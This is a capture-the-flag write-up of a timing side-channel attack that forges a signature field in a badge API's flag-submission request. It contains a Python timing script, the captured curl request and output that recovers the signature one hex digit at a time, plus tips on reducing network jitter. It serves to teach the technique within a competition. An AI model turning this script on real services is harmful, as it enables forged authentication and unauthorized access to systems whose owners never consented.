# 6. Take your Time

Doing previoes MITM task we saw interesting request in decrypted traffic:

![Burp](img/burp_oo.png)

or as curl request:
```bash
curl -i -s -k -X $'PUT' \
    -H $'User-Agent: BadgeOS HTTP Client' -H $'Host: ctf.techmaker.ua' -H $'Content-Type: application/json' -H $'Content-Length: 251' -H $'Connection: close' \
    --data-binary $'{\"flags\":[\"flag{5209d0c6b0f0a57891a486375296}\",\"flag{3fa83be12fc51644aa0387e53924}\",\"flag{5493ae98b23b28d5d41b599d8321}\",\"flag{z39f34578ac}\",\"<empty>\",\"<empty>\",\"<empty>\",\"<empty>\"],\"timeattack\":{\"solved\":false,\"rand\":340679415,\"sign\":\"ca92e4927c4e\"}}' \
    $'https://ctf.techmaker.ua/api/flags/2020/1105d536b308990c76c15b597edf723a'
```

We see found flags sent and some string:
```
"timeattack":{"solved":false,"rand":340679415,"sign":"ca92e4927c4e"}}
```

Name of this task and intercepted string both contain "time" hint i.e. surely we have to do something this string.

If the try just change **"solved":false** to **"solved":true** (using Burp's repeater or just run corresponding curl in terminal) we will get 403 error:

```
HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 18 Dec 2020 09:26:58 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Length: 133

{"type":"https://tools.ietf.org/html/rfc7231#section-6.5.3","title":"Forbidden","status":403,"traceId":"|baf54214-4df67befc906be5d."}
```

Looking closer to the 
```
"timeattack":{"solved":false,"rand":340679415,"sign":"ca92e4927c4e"}}
```
we can suggest that "soilved" is data field, "rand" is some kind of salt, "sign" - some kind of signature data with salt.

I.e. if data or salt changed signature must be updated too or request will be recognized as wrong.

H, and how we can crack signature? 

Naive brute-force 12 hex digits will take ... (16^12)*5ms = 44627 years (my ping to ctf.techmaker.ua is 5ms) and it is very optimistic estimation ^)

**Detect attack vector**

First will check how long does the request take in the case of correct and incorrect signature (simple script measures min, avg, max values):

```python
#!/usr/bin/env python
import requests
import json
import time
import copy

url = 'https://ctf.techmaker.ua/api/flags/2020/a9916f38886ce895c535849e2c0bf6d5'
headers = {'Content-type': 'application/json',  
           'Accept': 'text/plain',
           'Content-Encoding': 'utf-8',
           'User-Agent': 'BadgeOS HTTP Client'
           }

data_orig = {   "flags"     : ["flag{5209d0c6b0f0a57891a486375296}","flag{3fa83be12fc51644aa0387e53924}","flag{5493ae98b23b28d5d41b599d8321}","flag{z39f34578ac}","<empty>","<empty>","<empty>","<empty>"],
                "timeattack": {"solved":False,"rand":340679415,"sign":"ca92e4927c4e"}}

data_true = {   "flags"     : ["flag{5209d0c6b0f0a57891a486375296}","flag{3fa83be12fc51644aa0387e53924}","flag{5493ae98b23b28d5d41b599d8321}","flag{z39f34578ac}","<empty>","<empty>","<empty>","<empty>"],
                "timeattack": {"solved":True,"rand":340679415,"sign":"ca92e4927c4e"}}

def do(data):
    tmin = 100
    tavg = 0
    tmax = 0

    nn=3
    for _ in range(nn):
        start = time.time()
        request = requests.put(url, data=json.dumps(data), headers=headers)
        end = time.time()
        t = end - start
        tavg+=t
        if t<tmin:
            tmin=t
        if t>tmax:
            tmax=t
    tavg/=nn

    return ( request.status_code, tmin, tavg, tmax )

print(do(data_orig))
print(do(data_true))
```

and result is:

```
(200, 0.2321791648864746, 0.24847785631815592, 0.25815463066101074)
(403, 0.08228325843811035, 0.0932924747467041, 0.10093951225280762)
```
i.e. in the case of correct data we get 200 HTTP code and 230..250ms, in the case of incorrect - 403  HTTP code and just 80..100ms

Ok, let's check:

```python
sign_orig = list(data_orig["timeattack"]["sign"])
sign_str = "".join(sign_orig)

data = copy.deepcopy(data_orig)
data["timeattack"]["sign"] = sign_str
print("Checking {}: CODE={} min={:4f} avg={:4f} max={:4f}".format(sign_str, *do(data) ))

for i in range(len(sign_orig)-1,-1,-1):
    sign_orig[i]="0"
    sign_str = "".join(sign_orig)
    #data = copy.deepcopy(data_orig)
    data["timeattack"]["sign"] = sign_str
    print("Checking {}: CODE={} min={:4f} avg={:4f} max={:4f}".format(sign_str, *do(data) ))
```

and...:

```
Checking ca92e4927c4e: CODE=200 min=0.282603 avg=0.283471 max=0.284126
Checking ca92e4927c40: CODE=403 min=0.265895 avg=0.267751 max=0.268792
Checking ca92e4927c00: CODE=403 min=0.259467 avg=0.259825 max=0.260009
Checking ca92e4927000: CODE=403 min=0.247042 avg=0.247559 max=0.248101
Checking ca92e4920000: CODE=403 min=0.231468 avg=0.231962 max=0.232441
Checking ca92e4900000: CODE=403 min=0.219732 avg=0.222384 max=0.224665
Checking ca92e4000000: CODE=403 min=0.207553 avg=0.208013 max=0.208593
Checking ca92e0000000: CODE=403 min=0.195892 avg=0.197713 max=0.199080
Checking ca9200000000: CODE=403 min=0.184014 avg=0.184952 max=0.186492
Checking ca9000000000: CODE=403 min=0.171241 avg=0.174829 max=0.176837
Checking ca0000000000: CODE=403 min=0.163258 avg=0.163871 max=0.164648
Checking c00000000000: CODE=403 min=0.146373 avg=0.148941 max=0.151318
Checking 000000000000: CODE=403 min=0.138224 avg=0.138514 max=0.138714
```

DO YOU SEE THIS????
Request time directly depends on a number of correct symbols at the beginning of signatur!!!

**Do attack**

Let's try to do timimg attack:

```
python3 test.py
(200, 0.28458619117736816, 0.2848368485768636, 0.2852191925048828)
(403, 0.13846588134765625, 0.13851563135782877, 0.1386117935180664)
Checking ca92e4927c4e: CODE=200 min=0.282603 avg=0.283471 max=0.284126
Checking ca92e4927c40: CODE=403 min=0.265895 avg=0.267751 max=0.268792
Checking ca92e4927c00: CODE=403 min=0.259467 avg=0.259825 max=0.260009
Checking ca92e4927000: CODE=403 min=0.247042 avg=0.247559 max=0.248101
Checking ca92e4920000: CODE=403 min=0.231468 avg=0.231962 max=0.232441
Checking ca92e4900000: CODE=403 min=0.219732 avg=0.222384 max=0.224665
Checking ca92e4000000: CODE=403 min=0.207553 avg=0.208013 max=0.208593
Checking ca92e0000000: CODE=403 min=0.195892 avg=0.197713 max=0.199080
Checking ca9200000000: CODE=403 min=0.184014 avg=0.184952 max=0.186492
Checking ca9000000000: CODE=403 min=0.171241 avg=0.174829 max=0.176837
Checking ca0000000000: CODE=403 min=0.163258 avg=0.163871 max=0.164648
Checking c00000000000: CODE=403 min=0.146373 avg=0.148941 max=0.151318
Checking 000000000000: CODE=403 min=0.138224 avg=0.138514 max=0.138714
Time shift is: 0.01203155517578125
100000000000 0.14582586288452148
150000000000 0.16297626495361328
153000000000 0.17244672775268555
153e00000000 0.18734431266784668
153e90000000 0.19836974143981934
153e9d000000 0.2115771770477295
153e9d700000 0.22629261016845703
153e9d7b0000 0.2463541030883789
153e9d7b0000 0.24640345573425293
153e9d7b0600 0.2540316581726074
153e9d7b0640 0.2691001892089844
FOUND 200 -> 153e9d7b0642
153e9d7b0642 0.2828974723815918
```

Full time attack script is [here](scripts/test_requests.py),
but more stable results can be got using pyCurl [version](scripts/test_pycurl.py)

Some hints: 
1. If you get "Something wrong" message it means that time jitter is higher than delay of one symbol check - in such case attack using my script will be unsuccesfull - you will need to do much more statisctics analysis.

2. To decrease jitter (due to it caused by not only Internet channel but local system, running applications etc) choose OS without GUI with minimal applications installed, disabled auto-upgardes etc - I used Ubuntu Server 20.04. And placed it on Digital Ocean (using CPU-optimaized droplet due to in this case CPU core is fully dedicated).

During CTF I run script from home but it failed on first 2 digits (couldn't recognize correct values).
I wrote different script which brute-force first 2 digits and for most promising combinations did time attack on the rest digits of signature.
